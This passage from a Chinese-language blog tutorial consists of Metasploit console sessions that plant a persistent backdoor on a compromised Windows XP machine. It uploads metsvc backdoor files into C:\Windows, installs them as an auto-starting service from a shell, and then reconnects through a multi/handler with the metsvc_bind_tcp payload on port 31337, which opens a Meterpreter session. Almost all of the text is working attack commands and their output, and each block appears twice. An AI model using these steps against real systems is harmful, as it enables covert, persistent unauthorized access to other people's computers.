[*] uploaded : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >
|
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >
安装服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
c:\windows>metsvc.exe install-service
metsvc.exe install-service
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
c:\windows>
|
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
c:\windows>metsvc.exe install-service
metsvc.exe install-service
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
c:\windows>
然后你懂的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf exploit(handler) > exploit
[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800
meterpreter >
|
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf exploit(handler) > exploit
[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800
meterpreter >
结束语
还有很多东西想介绍 但是没时间搭建环境 所以写道这里
|
推荐
评论(0条)
